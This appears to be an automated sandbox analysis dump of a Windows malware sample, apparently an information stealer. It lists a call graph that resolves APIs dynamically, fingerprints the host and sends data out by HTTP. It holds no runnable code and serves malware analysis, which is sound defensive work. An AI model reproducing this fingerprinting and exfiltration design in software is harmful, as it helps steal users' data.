14173 3445c0 2 API calls 14172->14173 14174 344513 14173->14174 14175 3445c0 2 API calls 14174->14175 14176 34452c 14175->14176 14177 3445c0 2 API calls 14176->14177 14178 344545 14177->14178 14179 3445c0 2 API calls 14178->14179 14180 34455e 14179->14180 14181 3445c0 2 API calls 14180->14181 14182 344577 14181->14182 14183 3445c0 2 API calls 14182->14183 14184 344590 14183->14184 14185 3445c0 2 API calls 14184->14185 14186 3445a9 14185->14186 14187 359c10 14186->14187 14188 35a036 8 API calls 14187->14188 14189 359c20 43 API calls 14187->14189 14190 35a146 14188->14190 14191 35a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14188->14191 14189->14188 14192 35a216 14190->14192 14193 35a153 8 API calls 14190->14193 14191->14190 14194 35a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14192->14194 14195 35a298 14192->14195 14193->14192 14194->14195 14196 35a2a5 6 API calls 14195->14196 14197 35a337 14195->14197 14196->14197 14198 35a344 9 API calls 14197->14198 14199 35a41f 14197->14199 14198->14199 14200 35a4a2 14199->14200 14201 35a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14199->14201 14202 35a4dc 14200->14202 14203 35a4ab GetProcAddress GetProcAddress 14200->14203 14201->14200 14204 35a515 14202->14204 14205 35a4e5 GetProcAddress GetProcAddress 14202->14205 14203->14202 14206 35a612 14204->14206 14207 35a522 10 API calls 14204->14207 14205->14204 14208 35a67d 14206->14208 14209 35a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14206->14209 14207->14206 14210 35a686 GetProcAddress 14208->14210 14211 35a69e 14208->14211 14209->14208 14210->14211 14212 35a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14211->14212 14213 355ca3 14211->14213 14212->14213 14214 341590 14213->14214 15335 341670 14214->15335 14217 35a7a0 lstrcpy 14218 3415b5 14217->14218 14219 35a7a0 lstrcpy 14218->14219 14220 3415c7 14219->14220 14221 35a7a0 lstrcpy 
14220->14221 14222 3415d9 14221->14222 14223 35a7a0 lstrcpy 14222->14223 14224 341663 14223->14224 14225 355510 14224->14225 14226 355521 14225->14226 14227 35a820 2 API calls 14226->14227 14228 35552e 14227->14228 14229 35a820 2 API calls 14228->14229 14230 35553b 14229->14230 14231 35a820 2 API calls 14230->14231 14232 355548 14231->14232 14233 35a740 lstrcpy 14232->14233 14234 355555 14233->14234 14235 35a740 lstrcpy 14234->14235 14236 355562 14235->14236 14237 35a740 lstrcpy 14236->14237 14238 35556f 14237->14238 14239 35a740 lstrcpy 14238->14239 14279 35557c 14239->14279 14240 35a740 lstrcpy 14240->14279 14241 35a820 lstrlen lstrcpy 14241->14279 14242 355643 StrCmpCA 14242->14279 14243 3556a0 StrCmpCA 14244 3557dc 14243->14244 14243->14279 14245 35a8a0 lstrcpy 14244->14245 14246 3557e8 14245->14246 14247 35a820 2 API calls 14246->14247 14250 3557f6 14247->14250 14248 355856 StrCmpCA 14251 355991 14248->14251 14248->14279 14249 3551f0 20 API calls 14249->14279 14252 35a820 2 API calls 14250->14252 14254 35a8a0 lstrcpy 14251->14254 14253 355805 14252->14253 14255 341670 lstrcpy 14253->14255 14256 35599d 14254->14256 14278 355811 14255->14278 14257 35a820 2 API calls 14256->14257 14260 3559ab 14257->14260 14258 355a0b StrCmpCA 14262 355a16 Sleep 14258->14262 14263 355a28 14258->14263 14259 3552c0 25 API calls 14259->14279 14261 35a820 2 API calls 14260->14261 14264 3559ba 14261->14264 14262->14279 14265 35a8a0 lstrcpy 14263->14265 14266 341670 lstrcpy 14264->14266 14267 355a34 14265->14267 14266->14278 14268 35a820 2 API calls 14267->14268 14269 355a43 14268->14269 14270 35a820 2 API calls 14269->14270 14271 355a52 14270->14271 14273 341670 lstrcpy 14271->14273 14272 35578a StrCmpCA 14272->14279 14273->14278 14274 35a7a0 lstrcpy 14274->14279 14275 35593f StrCmpCA 14275->14279 14276 35a8a0 lstrcpy 14276->14279 14277 341590 lstrcpy 14277->14279 14278->13332 14279->14240 14279->14241 14279->14242 14279->14243 14279->14248 14279->14249 14279->14258 14279->14259 
14279->14272 14279->14274 14279->14275 14279->14276 14279->14277 14281 357553 GetVolumeInformationA 14280->14281 14282 35754c 14280->14282 14283 357591 14281->14283 14282->14281 14284 3575fc GetProcessHeap RtlAllocateHeap 14283->14284 14285 357619 14284->14285 14286 357628 wsprintfA 14284->14286 14287 35a740 lstrcpy 14285->14287 14288 35a740 lstrcpy 14286->14288 14289 355da7 14287->14289 14288->14289 14289->13353 14291 35a7a0 lstrcpy 14290->14291 14292 344899 14291->14292 15344 3447b0 14292->15344 14294 3448a5 14295 35a740 lstrcpy 14294->14295 14296 3448d7 14295->14296 14297 35a740 lstrcpy 14296->14297 14298 3448e4 14297->14298 14299 35a740 lstrcpy 14298->14299 14300 3448f1 14299->14300 14301 35a740 lstrcpy 14300->14301 14302 3448fe 14301->14302 14303 35a740 lstrcpy 14302->14303 14304 34490b InternetOpenA StrCmpCA 14303->14304 14305 344944 14304->14305 14306 344ecb InternetCloseHandle 14305->14306 15350 358b60 14305->15350 14307 344ee8 14306->14307 15365 349ac0 CryptStringToBinaryA 14307->15365 14309 344963 15358 35a920 14309->15358 14312 344976 14314 35a8a0 lstrcpy 14312->14314 14319 34497f 14314->14319 14315 35a820 2 API calls 14316 344f05 14315->14316 14318 35a9b0 4 API calls 14316->14318 14317 344f27 ctype 14321 35a7a0 lstrcpy 14317->14321 14320 344f1b 14318->14320 14323 35a9b0 4 API calls 14319->14323 14322 35a8a0 lstrcpy 14320->14322 14334 344f57 14321->14334 14322->14317 14324 3449a9 14323->14324 14325 35a8a0 lstrcpy 14324->14325 14326 3449b2 14325->14326 14327 35a9b0 4 API calls 14326->14327 14328 3449d1 14327->14328 14329 35a8a0 lstrcpy 14328->14329 14330 3449da 14329->14330 14331 35a920 3 API calls 14330->14331 14332 3449f8 14331->14332 14333 35a8a0 lstrcpy 14332->14333 14335 344a01 14333->14335 14334->13356 14336 35a9b0 4 API calls 14335->14336 14337 344a20 14336->14337 14338 35a8a0 lstrcpy 14337->14338 14339 344a29 14338->14339 14340 35a9b0 4 API calls 14339->14340 14341 344a48 14340->14341 14342 35a8a0 lstrcpy 14341->14342 14343 344a51 14342->14343 
14344 35a9b0 4 API calls 14343->14344 14345 344a7d 14344->14345 14346 35a920 3 API calls 14345->14346 14347 344a84 14346->14347 14348 35a8a0 lstrcpy 14347->14348 14349 344a8d 14348->14349 14350 344aa3 InternetConnectA 14349->14350 14350->14306 14351 344ad3 HttpOpenRequestA 14350->14351 14353 344ebe InternetCloseHandle 14351->14353 14354 344b28 14351->14354 14353->14306 14355 35a9b0 4 API calls 14354->14355 14356 344b3c 14355->14356 14357 35a8a0 lstrcpy 14356->14357 14358 344b45 14357->14358 14359 35a920 3 API calls 14358->14359 14360 344b63 14359->14360 14361 35a8a0 lstrcpy 14360->14361 14362 344b6c 14361->14362 14363 35a9b0 4 API calls 14362->14363 14364 344b8b 14363->14364 14365 35a8a0 lstrcpy 14364->14365 14366 344b94 14365->14366 14367 35a9b0 4 API calls 14366->14367 14368 344bb5 14367->14368 14369 35a8a0 lstrcpy 14368->14369 14370 344bbe 14369->14370 14371 35a9b0 4 API calls 14370->14371 14372 344bde 14371->14372 14373 35a8a0 lstrcpy 14372->14373 14374 344be7 14373->14374 14375 35a9b0 4 API calls 14374->14375 14376 344c06 14375->14376 14377 35a8a0 lstrcpy 14376->14377 14378 344c0f 14377->14378 14379 35a920 3 API calls 14378->14379 14380 344c2d 14379->14380 14381 35a8a0 lstrcpy 14380->14381 14382 344c36 14381->14382 14383 35a9b0 4 API calls 14382->14383 14384 344c55 14383->14384 14385 35a8a0 lstrcpy 14384->14385 14386 344c5e 14385->14386 14387 35a9b0 4 API calls 14386->14387 14388 344c7d 14387->14388 14389 35a8a0 lstrcpy 14388->14389 14390 344c86 14389->14390 14391 35a920 3 API calls 14390->14391 14392 344ca4 14391->14392 14393 35a8a0 lstrcpy 14392->14393 14394 344cad 14393->14394 14395 35a9b0 4 API calls 14394->14395 14396 344ccc 14395->14396 14397 35a8a0 lstrcpy 14396->14397 14398 344cd5 14397->14398 14399 35a9b0 4 API calls 14398->14399 14400 344cf6 14399->14400 14401 35a8a0 lstrcpy 14400->14401 14402 344cff 14401->14402 14403 35a9b0 4 API calls 14402->14403 14404 344d1f 14403->14404 14405 35a8a0 lstrcpy 14404->14405 14406 344d28 14405->14406 14407 35a9b0 4 
API calls 14406->14407 14408 344d47 14407->14408 14409 35a8a0 lstrcpy 14408->14409 14410 344d50 14409->14410 14411 35a920 3 API calls 14410->14411 14412 344d6e 14411->14412 14413 35a8a0 lstrcpy 14412->14413 14414 344d77 14413->14414 14415 35a740 lstrcpy 14414->14415 14416 344d92 14415->14416 14417 35a920 3 API calls 14416->14417 14418 344db3 14417->14418 14419 35a920 3 API calls 14418->14419 14420 344dba 14419->14420 14421 35a8a0 lstrcpy 14420->14421 14422 344dc6 14421->14422 14423 344de7 lstrlen 14422->14423 14424 344dfa 14423->14424 14425 344e03 lstrlen 14424->14425 15364 35aad0 14425->15364 14427 344e13 HttpSendRequestA 14428 344e32 InternetReadFile 14427->14428 14429 344e67 InternetCloseHandle 14428->14429 14434 344e5e 14428->14434 14432 35a800 14429->14432 14431 35a9b0 4 API calls 14431->14434 14432->14353 14433 35a8a0 lstrcpy 14433->14434 14434->14428 14434->14429 14434->14431 14434->14433 15371 35aad0 14435->15371 14437 3517c4 StrCmpCA 14438 3517d7 14437->14438 14439 3517cf ExitProcess 14437->14439 14440 3519c2 14438->14440 14441 3518f1 StrCmpCA 14438->14441 14442 351951 StrCmpCA 14438->14442 14443 351970 StrCmpCA 14438->14443 14444 351913 StrCmpCA 14438->14444 14445 351932 StrCmpCA 14438->14445 14446 35185d StrCmpCA 14438->14446 14447 35187f StrCmpCA 14438->14447 14448 3518ad StrCmpCA 14438->14448 14449 3518cf StrCmpCA 14438->14449 14450 35a820 lstrlen lstrcpy 14438->14450 14440->13358 14441->14438 14442->14438 14443->14438 14444->14438 14445->14438 14446->14438 14447->14438 14448->14438 14449->14438 14450->14438 14452 35a7a0 lstrcpy 14451->14452 14453 345979 14452->14453 14454 3447b0 2 API calls 14453->14454 14455 345985 14454->14455 14456 35a740 lstrcpy 14455->14456 14457 3459ba 14456->14457 14458 35a740 lstrcpy 14457->14458 14459 3459c7 14458->14459 14460 35a740 lstrcpy 14459->14460 14461 3459d4 14460->14461 14462 35a740 lstrcpy 14461->14462 14463 3459e1 14462->14463 14464 35a740 lstrcpy 14463->14464 14465 3459ee InternetOpenA StrCmpCA 14464->14465 14466 
345a1d 14465->14466 14467 345fc3 InternetCloseHandle 14466->14467 14468 358b60 3 API calls 14466->14468 14469 345fe0 14467->14469 14470 345a3c 14468->14470 14472 349ac0 4 API calls 14469->14472 14471 35a920 3 API calls 14470->14471 14473 345a4f 14471->14473 14474 345fe6 14472->14474 14475 35a8a0 lstrcpy 14473->14475 14476 35a820 2 API calls 14474->14476 14479 34601f ctype 14474->14479 14481 345a58 14475->14481 14477 345ffd 14476->14477 14478 35a9b0 4 API calls 14477->14478 14480 346013 14478->14480 14483 35a7a0 lstrcpy 14479->14483 14482 35a8a0 lstrcpy 14480->14482 14484 35a9b0 4 API calls 14481->14484 14482->14479 14492 34604f 14483->14492 14485 345a82 14484->14485 14486 35a8a0 lstrcpy 14485->14486 14487 345a8b 14486->14487 14488 35a9b0 4 API calls 14487->14488 14489 345aaa 14488->14489 14490 35a8a0 lstrcpy 14489->14490 14491 345ab3 14490->14491 14493 35a920 3 API calls 14491->14493 14492->13364 14494 345ad1 14493->14494 14495 35a8a0 lstrcpy 14494->14495 14496 345ada 14495->14496 14497 35a9b0 4 API calls 14496->14497 14498 345af9 14497->14498 14499 35a8a0 lstrcpy 14498->14499 14500 345b02 14499->14500 14501 35a9b0 4 API calls 14500->14501 14502 345b21 14501->14502 14503 35a8a0 lstrcpy 14502->14503 14504 345b2a 14503->14504 14505 35a9b0 4 API calls 14504->14505 14506 345b56 14505->14506 14507 35a920 3 API calls 14506->14507 14508 345b5d 14507->14508 14509 35a8a0 lstrcpy 14508->14509 14510 345b66 14509->14510 14511 345b7c InternetConnectA 14510->14511 14511->14467 14512 345bac HttpOpenRequestA 14511->14512 14514 345fb6 InternetCloseHandle 14512->14514 14515 345c0b 14512->14515 14514->14467 14516 35a9b0 4 API calls 14515->14516 14517 345c1f 14516->14517 14518 35a8a0 lstrcpy 14517->14518 14519 345c28 14518->14519 14520 35a920 3 API calls 14519->14520 14521 345c46 14520->14521 14522 35a8a0 lstrcpy 14521->14522 14523 345c4f 14522->14523 14524 35a9b0 4 API calls 14523->14524 14525 345c6e 14524->14525 14526 35a8a0 lstrcpy 14525->14526 14527 345c77 14526->14527 14528 
35a9b0 4 API calls 14527->14528 14529 345c98 14528->14529 14530 35a8a0 lstrcpy 14529->14530 14531 345ca1 14530->14531 14532 35a9b0 4 API calls 14531->14532 14533 345cc1 14532->14533 14534 35a8a0 lstrcpy 14533->14534 14535 345cca 14534->14535 14536 35a9b0 4 API calls 14535->14536 14537 345ce9 14536->14537 14538 35a8a0 lstrcpy 14537->14538 14539 345cf2 14538->14539 14540 35a920 3 API calls 14539->14540 14541 345d10 14540->14541 14542 35a8a0 lstrcpy 14541->14542 14543 345d19 14542->14543 14544 35a9b0 4 API calls 14543->14544 14545 345d38 14544->14545 14546 35a8a0 lstrcpy 14545->14546 14547 345d41 14546->14547 14548 35a9b0 4 API calls 14547->14548 14549 345d60 14548->14549 14550 35a8a0 lstrcpy 14549->14550 14551 345d69 14550->14551 14552 35a920 3 API calls 14551->14552 14553 345d87 14552->14553 14554 35a8a0 lstrcpy 14553->14554 14555 345d90 14554->14555 14556 35a9b0 4 API calls 14555->14556 14557 345daf 14556->14557 14558 35a8a0 lstrcpy 14557->14558 14559 345db8 14558->14559 14560 35a9b0 4 API calls 14559->14560 14561 345dd9 14560->14561 14562 35a8a0 lstrcpy 14561->14562 14563 345de2 14562->14563 14564 35a9b0 4 API calls 14563->14564 14565 345e02 14564->14565 14566 35a8a0 lstrcpy 14565->14566 14567 345e0b 14566->14567 14568 35a9b0 4 API calls 14567->14568 14569 345e2a 14568->14569 14570 35a8a0 lstrcpy 14569->14570 14571 345e33 14570->14571 14572 35a920 3 API calls 14571->14572 14573 345e54 14572->14573 14574 35a8a0 lstrcpy 14573->14574 14575 345e5d 14574->14575 14576 345e70 lstrlen 14575->14576 15372 35aad0 14576->15372 14578 345e81 lstrlen GetProcessHeap RtlAllocateHeap 15373 35aad0 14578->15373 14580 345eae lstrlen 14581 345ebe 14580->14581 14582 345ed7 lstrlen 14581->14582 14583 345ee7 14582->14583 14584 345ef0 lstrlen 14583->14584 14585 345f04 14584->14585 14586 345f1a lstrlen 14585->14586 15374 35aad0 14586->15374 14588 345f2a HttpSendRequestA 14589 345f35 InternetReadFile 14588->14589 14590 345f6a InternetCloseHandle 14589->14590 14594 345f61 14589->14594 
14590->14514 14592 35a9b0 4 API calls 14592->14594 14593 35a8a0 lstrcpy 14593->14594 14594->14589 14594->14590 14594->14592 14594->14593 14597 351077 14595->14597 14596 351151 14596->13366 14597->14596 14598 35a820 lstrlen lstrcpy 14597->14598 14598->14597 14600 350db7 14599->14600 14601 350f17 14600->14601 14602 350ea4 StrCmpCA 14600->14602 14603 350e27 StrCmpCA 14600->14603 14604 350e67 StrCmpCA 14600->14604 14605 35a820 lstrlen lstrcpy 14600->14605 14601->13374 14602->14600 14603->14600 14604->14600 14605->14600 14610 350f67 14606->14610 14607 351044 14607->13382 14608 350fb2 StrCmpCA 14608->14610 14609 35a820 lstrlen lstrcpy 14609->14610 14610->14607 14610->14608 14610->14609 14612 35a740 lstrcpy 14611->14612 14613 351a26 14612->14613 14614 35a9b0 4 API calls 14613->14614 14615 351a37 14614->14615 14616 35a8a0 lstrcpy 14615->14616 14617 351a40 14616->14617 14618 35a9b0 4 API calls 14617->14618 14619 351a5b 14618->14619 14620 35a8a0 lstrcpy 14619->14620 14621 351a64 14620->14621 14622 35a9b0 4 API calls 14621->14622 14623 351a7d 14622->14623 14624 35a8a0 lstrcpy 14623->14624 14625 351a86 14624->14625 14626 35a9b0 4 API calls 14625->14626 14627 351aa1 14626->14627 14628 35a8a0 lstrcpy 14627->14628 14629 351aaa 14628->14629 14630 35a9b0 4 API calls 14629->14630 14631 351ac3 14630->14631 14632 35a8a0 lstrcpy 14631->14632 14633 351acc 14632->14633 14634 35a9b0 4 API calls 14633->14634 14635 351ae7 14634->14635 14636 35a8a0 lstrcpy 14635->14636 14637 351af0 14636->14637 14638 35a9b0 4 API calls 14637->14638 14639 351b09 14638->14639 14640 35a8a0 lstrcpy 14639->14640 14641 351b12 14640->14641 14642 35a9b0 4 API calls 14641->14642 14643 351b2d 14642->14643 14644 35a8a0 lstrcpy 14643->14644 14645 351b36 14644->14645 14646 35a9b0 4 API calls 14645->14646 14647 351b4f 14646->14647 14648 35a8a0 lstrcpy 14647->14648 14649 351b58 14648->14649 14650 35a9b0 4 API calls 14649->14650 14651 351b76 14650->14651 14652 35a8a0 lstrcpy 14651->14652 14653 351b7f 14652->14653 14654 
357500 6 API calls 14653->14654 14655 351b96 14654->14655 14656 35a920 3 API calls 14655->14656 14657 351ba9 14656->14657 14658 35a8a0 lstrcpy 14657->14658 14659 351bb2 14658->14659 14660 35a9b0 4 API calls 14659->14660 14661 351bdc 14660->14661 14662 35a8a0 lstrcpy 14661->14662 14663 351be5 14662->14663 14664 35a9b0 4 API calls 14663->14664 14665 351c05 14664->14665 14666 35a8a0 lstrcpy 14665->14666 14667 351c0e 14666->14667 15375 357690 GetProcessHeap RtlAllocateHeap 14667->15375 14670 35a9b0 4 API calls 14671 351c2e 14670->14671 14672 35a8a0 lstrcpy 14671->14672 14673 351c37 14672->14673 14674 35a9b0 4 API calls 14673->14674 14675 351c56 14674->14675 14676 35a8a0 lstrcpy 14675->14676 14677 351c5f 14676->14677 14678 35a9b0 4 API calls 14677->14678 14679 351c80 14678->14679 14680 35a8a0 lstrcpy 14679->14680 14681 351c89 14680->14681 15382 3577c0 GetCurrentProcess IsWow64Process 14681->15382 14684 35a9b0 4 API calls 14685 351ca9 14684->14685 14686 35a8a0 lstrcpy 14685->14686 14687 351cb2 14686->14687 14688 35a9b0 4 API calls 14687->14688 14689 351cd1 14688->14689 14690 35a8a0 lstrcpy 14689->14690 14691 351cda 14690->14691 14692 35a9b0 4 API calls 14691->14692 14693 351cfb 14692->14693 14694 35a8a0 lstrcpy 14693->14694 14695 351d04 14694->14695 14696 357850 3 API calls 14695->14696 14697 351d14 14696->14697 14698 35a9b0 4 API calls 14697->14698 14699 351d24 14698->14699 14700 35a8a0 lstrcpy 14699->14700 14701 351d2d 14700->14701 14702 35a9b0 4 API calls 14701->14702 14703 351d4c 14702->14703 14704 35a8a0 lstrcpy 14703->14704 14705 351d55 14704->14705 14706 35a9b0 4 API calls 14705->14706 14707 351d75 14706->14707 14708 35a8a0 lstrcpy 14707->14708 14709 351d7e 14708->14709 14710 3578e0 3 API calls 14709->14710 14711 351d8e 14710->14711 14712 35a9b0 4 API calls 14711->14712 14713 351d9e 14712->14713 14714 35a8a0 lstrcpy 14713->14714 14715 351da7 14714->14715 14716 35a9b0 4 API calls 14715->14716 14717 351dc6 14716->14717 14718 35a8a0 lstrcpy 14717->14718 14719 351dcf 
14718->14719 14720 35a9b0 4 API calls 14719->14720 14721 351df0 14720->14721 14722 35a8a0 lstrcpy 14721->14722 14723 351df9 14722->14723 15384 357980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14723->15384 14726 35a9b0 4 API calls 14727 351e19 14726->14727 14728 35a8a0 lstrcpy 14727->14728 14729 351e22 14728->14729 14730 35a9b0 4 API calls 14729->14730 14731 351e41 14730->14731 14732 35a8a0 lstrcpy 14731->14732 14733 351e4a 14732->14733 14734 35a9b0 4 API calls 14733->14734 14735 351e6b 14734->14735 14736 35a8a0 lstrcpy 14735->14736 14737 351e74 14736->14737 15386 357a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14737->15386 14740 35a9b0 4 API calls 14741 351e94 14740->14741 14742 35a8a0 lstrcpy 14741->14742 14743 351e9d 14742->14743 14744 35a9b0 4 API calls 14743->14744 14745 351ebc 14744->14745 14746 35a8a0 lstrcpy 14745->14746 14747 351ec5 14746->14747 14748 35a9b0 4 API calls 14747->14748 14749 351ee5 14748->14749 14750 35a8a0 lstrcpy 14749->14750 14751 351eee 14750->14751 15389 357b00 GetUserDefaultLocaleName 14751->15389 14754 35a9b0 4 API calls 14755 351f0e 14754->14755 14756 35a8a0 lstrcpy 14755->14756 14757 351f17 14756->14757 14758 35a9b0 4 API calls 14757->14758 14759 351f36 14758->14759 14760 35a8a0 lstrcpy 14759->14760 14761 351f3f 14760->14761 14762 35a9b0 4 API calls 14761->14762 14763 351f60 14762->14763 14764 35a8a0 lstrcpy 14763->14764 14765 351f69 14764->14765 15393 357b90 14765->15393 14767 351f80 14768 35a920 3 API calls 14767->14768 14769 351f93 14768->14769 14770 35a8a0 lstrcpy 14769->14770 14771 351f9c 14770->14771 14772 35a9b0 4 API calls 14771->14772 14773 351fc6 14772->14773 14774 35a8a0 lstrcpy 14773->14774 14775 351fcf 14774->14775 14776 35a9b0 4 API calls 14775->14776 14777 351fef 14776->14777 14778 35a8a0 lstrcpy 14777->14778 14779 351ff8 14778->14779 15405 357d80 GetSystemPowerStatus 14779->15405 14782 35a9b0 4 API calls 14783 352018 14782->14783 14784 35a8a0 lstrcpy 14783->14784 14785 352021 14784->14785 14786 
35a9b0 4 API calls 14785->14786 14787 352040 14786->14787 14788 35a8a0 lstrcpy 14787->14788 14789 352049 14788->14789 14790 35a9b0 4 API calls 14789->14790 14791 35206a 14790->14791 14792 35a8a0 lstrcpy 14791->14792 14793 352073 14792->14793 14794 35207e GetCurrentProcessId 14793->14794 15407 359470 OpenProcess 14794->15407 14797 35a920 3 API calls 14798 3520a4 14797->14798 14799 35a8a0 lstrcpy 14798->14799 14800 3520ad 14799->14800 14801 35a9b0 4 API calls 14800->14801 14802 3520d7 14801->14802 14803 35a8a0 lstrcpy 14802->14803 14804 3520e0 14803->14804 14805 35a9b0 4 API calls 14804->14805 14806 352100 14805->14806 14807 35a8a0 lstrcpy 14806->14807 14808 352109 14807->14808 15412 357e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14808->15412 14811 35a9b0 4 API calls 14812 352129 14811->14812 14813 35a8a0 lstrcpy 14812->14813 14814 352132 14813->14814 14815 35a9b0 4 API calls 14814->14815 14816 352151 14815->14816 14817 35a8a0 lstrcpy 14816->14817 14818 35215a 14817->14818 14819 35a9b0 4 API calls 14818->14819 14820 35217b 14819->14820 14821 35a8a0 lstrcpy 14820->14821 14822 352184 14821->14822 15416 357f60 14822->15416 14825 35a9b0 4 API calls 14826 3521a4 14825->14826 14827 35a8a0 lstrcpy 14826->14827 14828 3521ad 14827->14828 14829 35a9b0 4 API calls 14828->14829 14830 3521cc 14829->14830 14831 35a8a0 lstrcpy 14830->14831 14832 3521d5 14831->14832 14833 35a9b0 4 API calls 14832->14833 14834 3521f6 14833->14834 14835 35a8a0 lstrcpy 14834->14835 14836 3521ff 14835->14836 15429 357ed0 GetSystemInfo wsprintfA 14836->15429 14839 35a9b0 4 API calls 14840 35221f 14839->14840 14841 35a8a0 lstrcpy 14840->14841 14842 352228 14841->14842 14843 35a9b0 4 API calls 14842->14843 14844 352247 14843->14844 14845 35a8a0 lstrcpy 14844->14845 14846 352250 14845->14846 14847 35a9b0 4 API calls 14846->14847 14848 352270 14847->14848 14849 35a8a0 lstrcpy 14848->14849 14850 352279 14849->14850 15431 358100 GetProcessHeap RtlAllocateHeap 14850->15431 14853 35a9b0 4 API calls 14854 
352299 14853->14854 14855 35a8a0 lstrcpy 14854->14855 14856 3522a2 14855->14856 14857 35a9b0 4 API calls 14856->14857 14858 3522c1 14857->14858 14859 35a8a0 lstrcpy 14858->14859 14860 3522ca 14859->14860 14861 35a9b0 4 API calls 14860->14861 14862 3522eb 14861->14862 14863 35a8a0 lstrcpy 14862->14863 14864 3522f4 14863->14864 15437 3587c0 14864->15437 14867 35a920 3 API calls 14868 35231e 14867->14868 14869 35a8a0 lstrcpy 14868->14869 14870 352327 14869->14870 14871 35a9b0 4 API calls 14870->14871 14872 352351 14871->14872 14873 35a8a0 lstrcpy 14872->14873 14874 35235a 14873->14874 14875 35a9b0 4 API calls 14874->14875 14876 35237a 14875->14876 14877 35a8a0 lstrcpy 14876->14877 14878 352383 14877->14878 14879 35a9b0 4 API calls 14878->14879 14880 3523a2 14879->14880 14881 35a8a0 lstrcpy 14880->14881 14882 3523ab 14881->14882 15442 3581f0 14882->15442 14884 3523c2 14885 35a920 3 API calls 14884->14885 14886 3523d5 14885->14886 14887 35a8a0 lstrcpy 14886->14887 14888 3523de 14887->14888 14889 35a9b0 4 API calls 14888->14889 14890 35240a 14889->14890 14891 35a8a0 lstrcpy 14890->14891 14892 352413 14891->14892 14893 35a9b0 4 API calls 14892->14893 14894 352432 14893->14894 14895 35a8a0 lstrcpy 14894->14895 14896 35243b 14895->14896 14897 35a9b0 4 API calls 14896->14897 14898 35245c 14897->14898 14899 35a8a0 lstrcpy 14898->14899 14900 352465 14899->14900 14901 35a9b0 4 API calls 14900->14901 14902 352484 14901->14902 14903 35a8a0 lstrcpy 14902->14903 14904 35248d 14903->14904 14905 35a9b0 4 API calls 14904->14905 14906 3524ae 14905->14906 14907 35a8a0 lstrcpy 14906->14907 14908 3524b7 14907->14908 15450 358320 14908->15450 14910 3524d3 14911 35a920 3 API calls 14910->14911 14912 3524e6 14911->14912 14913 35a8a0 lstrcpy 14912->14913 14914 3524ef 14913->14914 14915 35a9b0 4 API calls 14914->14915 14916 352519 14915->14916 14917 35a8a0 lstrcpy 14916->14917 14918 352522 14917->14918 14919 35a9b0 4 API calls 14918->14919 14920 352543 14919->14920 14921 35a8a0 lstrcpy 
14920->14921 14922 35254c 14921->14922 14923 358320 17 API calls 14922->14923 14924 352568 14923->14924 14925 35a920 3 API calls 14924->14925 14926 35257b 14925->14926 14927 35a8a0 lstrcpy 14926->14927 14928 352584 14927->14928 14929 35a9b0 4 API calls 14928->14929 14930 3525ae 14929->14930 14931 35a8a0 lstrcpy 14930->14931 14932 3525b7 14931->14932 14933 35a9b0 4 API calls 14932->14933 14934 3525d6 14933->14934 14935 35a8a0 lstrcpy 14934->14935 14936 3525df 14935->14936 14937 35a9b0 4 API calls 14936->14937 14938 352600 14937->14938 14939 35a8a0 lstrcpy 14938->14939 14940 352609 14939->14940 15486 358680 14940->15486 14942 352620 14943 35a920 3 API calls 14942->14943 14944 352633 14943->14944 14945 35a8a0 lstrcpy 14944->14945 14946 35263c 14945->14946 14947 35265a lstrlen 14946->14947 14948 35266a 14947->14948 14949 35a740 lstrcpy 14948->14949 14950 35267c 14949->14950 14951 341590 lstrcpy 14950->14951 14952 35268d 14951->14952 15496 355190 14952->15496 14954 352699 14954->13386 15684 35aad0 14955->15684 14957 345009 InternetOpenUrlA 14958 345021 14957->14958 14959 3450a0 InternetCloseHandle InternetCloseHandle 14958->14959 14960 34502a InternetReadFile 14958->14960 14961 3450ec 14959->14961 14960->14958 14961->13390 15685 3498d0 14962->15685 14964 350759 14965 35077d 14964->14965 14966 350a38 14964->14966 14968 350799 StrCmpCA 14965->14968 14967 341590 lstrcpy 14966->14967 14969 350a49 14967->14969 14970 3507a8 14968->14970 14997 350843 14968->14997 15861 350250 14969->15861 14972 35a7a0 lstrcpy 14970->14972 14975 3507c3 14972->14975 14974 350865 StrCmpCA 14976 350874 14974->14976 15014 35096b 14974->15014 14977 341590 lstrcpy 14975->14977 14978 35a740 lstrcpy 14976->14978 14979 35080c 14977->14979 14981 350881 14978->14981 14982 35a7a0 lstrcpy 14979->14982 14980 35099c StrCmpCA 14983 3509ab 14980->14983 15003 350a2d 14980->15003 14984 35a9b0 4 API calls 14981->14984 14985 350823 14982->14985 14986 341590 lstrcpy 14983->14986 14987 3508ac 14984->14987 14988 

                            Control-flow Graph (function at 00359860)
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00FB2C00), ref: 003598A1
                            • GetProcAddress.KERNEL32(74DD0000,00FB2AC8), ref: 003598BA
                            • GetProcAddress.KERNEL32(74DD0000,00FB2A20), ref: 003598D2
                            • GetProcAddress.KERNEL32(74DD0000,00FB2C18), ref: 003598EA
                            • GetProcAddress.KERNEL32(74DD0000,00FB2A80), ref: 00359903
                            • GetProcAddress.KERNEL32(74DD0000,00FB98D8), ref: 0035991B
                            • GetProcAddress.KERNEL32(74DD0000,00FA5330), ref: 00359933
                            • GetProcAddress.KERNEL32(74DD0000,00FA5510), ref: 0035994C
                            • GetProcAddress.KERNEL32(74DD0000,00FB2B58), ref: 00359964
                            • GetProcAddress.KERNEL32(74DD0000,00FB2C30), ref: 0035997C
                            • GetProcAddress.KERNEL32(74DD0000,00FB2AF8), ref: 00359995
                            • GetProcAddress.KERNEL32(74DD0000,00FB2978), ref: 003599AD
                            • GetProcAddress.KERNEL32(74DD0000,00FA53D0), ref: 003599C5
                            • GetProcAddress.KERNEL32(74DD0000,00FB2B28), ref: 003599DE
                            • GetProcAddress.KERNEL32(74DD0000,00FB2BA0), ref: 003599F6
                            • GetProcAddress.KERNEL32(74DD0000,00FA5470), ref: 00359A0E
                            • GetProcAddress.KERNEL32(74DD0000,00FB2990), ref: 00359A27
                            • GetProcAddress.KERNEL32(74DD0000,00FB2B10), ref: 00359A3F
                            • GetProcAddress.KERNEL32(74DD0000,00FA53F0), ref: 00359A57
